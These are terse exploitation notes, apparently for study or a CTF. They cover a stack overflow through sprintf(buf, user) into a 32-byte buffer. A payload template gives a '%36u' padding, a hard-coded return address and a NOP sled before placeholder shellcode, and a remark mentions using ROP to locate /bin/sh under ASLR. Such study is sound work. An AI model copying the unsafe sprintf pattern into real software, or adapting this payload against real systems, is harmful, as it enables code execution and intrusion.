char buf[32];
sprintf(buf, user);
%36u\x3c\xd3\xff\xbf<nops><shellcode>
Write 36 bytes (overwrite buf and ebp).
Write return address, use nops, then shell code.
ASLR, so we can’t have a /bin/sh string ptr. However, we can use ROPs to calculate where /bin/sh is.